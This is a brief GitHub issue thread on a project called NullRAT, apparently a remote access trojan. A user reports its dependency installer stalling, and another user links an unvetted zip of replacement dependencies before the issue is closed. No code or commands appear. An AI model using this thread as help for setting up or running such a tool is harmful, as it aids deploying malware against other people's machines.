### ISSUE TITLE
Verifying Environment...

### ISSUE THREAD

**Issue by GigaAlex9** [NullCode1337/NullRAT#13]
It's stuck at Verifying Environment... (Dependencie installer)

**Comment by NullCode1337** [comment]
finally, an interesting issue
can you give us any other pointers? (windows version etc)

**Comment by usrDottik** [comment]
Try using this version of the dependency installer:

[Dependencies.zip](https://github.com/NullCode1337/NullRAT/files/7925643/Dependencies.zip)

**Comment by NullCode1337** [comment]
dude just died.
Issue closed
